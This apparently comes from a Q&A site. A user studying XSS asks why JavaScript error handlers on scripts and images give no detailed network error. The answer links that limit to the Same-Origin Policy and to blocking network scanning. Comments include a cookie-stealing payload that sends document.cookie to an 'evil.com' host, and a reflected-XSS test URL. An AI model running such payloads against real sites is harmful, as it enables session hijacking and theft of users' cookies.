# why dont i get "NetworkError" in javascript when i use <script src="false_ip">?

Tags: javascript, src, onerror

this is my simple script,

```
<script>
window.onerror = err;

var script = document.createElement('script');
script.src = "192.186.1.1.1.1.1";
script.onerror = err;
document.body.appendChild(script);

function err(msg, loc, a, b) {
alert(msg + "/" + loc);
}

</script>
```

but when i load this i get,

```
[object Event]/undefined
```

when i run the same on "firebug"  i get detailed error like,

```
NetworkError: 404 Not Found - http://localhost/XSS/192.186.1.1.1.1.1"
```

So how can i get a detailed error .

try-catch alos doesnt work

```
try {

var script = document.createElement('script');
script.src = "192.186.1.1.1";
document.body.appendChild(script);

} catch(e) {
    alert(e.name);

}
```

does that method will work only in old browsers ?

img.src also doesnt provide fire error handler. why?

```
var img = new Image();
 img.src="gifffff/asasa/ss" ;
```

Comment: Very interesting address: `localhost/XSS/CHAPTER_4_AttackMethods/INTRANET_hacking/192.186.1.1.1.1.1`

Comment: i tried to get error..but it doesnt. why?

Answer (score 1, accepted):

Firebug is not code, but a browser diagnostic tool running on the agent's behalf. (JavaScript cannot read the result of the firebug console.)

Now, for the cases:

- The `Image.error` event *never says why the loading failed*. There is no provision to include the "reason" in the HTML specification; problem solved by not being a feature to begin with.
- The `catch` doesn't work because there was no Exception thrown by the code.

  The Image is still an Image and can still be added to the DOM
  regardless of if the resource (eventually) fails to load.

  (The `src` is still set to a valid URI component - it would have thrown an exception on an invalid/unknown URI scheme.)

---

Having this *general* limitation (on any [Image] resource, even on the same origin) *also* prevents violation of the Same-Origin Policy - and the ability for malicious code to run various network scanning attacks.

Comment: You forgot to mention that to have the effect he wishes, the url **must** start with `http://`, `https://`or even `//` do identify that it is a full url. Without it, the browser will (correctly) assume that the IP is simply a folder in the server.

Comment: @IsmaelMiguel Good point. That was actually why my first answer revisions started on the wrong foot. (Same-Origin is only secondary as it was not being applied at all.)

Comment: in which language firebug is created ? which book i need to refer to create that type of tools.

Comment: so if someone want to send cookie to a server using:  "document.write('<img src="https://yourserver.evil.com/collect.gif?cookie=' + document.cookie + '" />)"...it wont work now? right? so which method attackers use? actually am studying XSS vulnerability.please help me..

Comment: @samanta That vulnerability/vector will work just fine - assuming document.cookie represents useful cookie information that can be read from JavaScript. _Cross-Origin policies do not prevent sending a [GET] request_, only inspecting the response data (or status of) such a request. Cookies can and usually _should_ be marked as [HttpOnly Cookies](http://blog.codinghorror.com/protecting-your-cookies-httponly/) to prevent access from JavaScript. (The problem with the presented attack is _not_ Cross-Origin, but rather XSS.)

Comment: thanks. but in my address bar when i try:- http://localhost?name=bbb<script>var x='mm';document.write(x);</script>    it works. but when i put quotes("")  like,:-    <script>var x='mm';document.write(""+x+"");</script>     it doesnt work. is it any security related issue??

Comment: That is a different issue than above or the question. Inspect the "written" document values to find out what the differences are; and make sure there are no JavaScript errors.

Comment: k.but in net i found XSS attackers use something like this:- window.onerror=err; var script = document.createElement('script'); script.src = URL; document.body.appendChild(script);  function err(msg, loc, a){  alert(msg); }     ,    and use the "msg" to take decision.  But now it wont work. why ?  "msg" :-always get "Script Error."  only.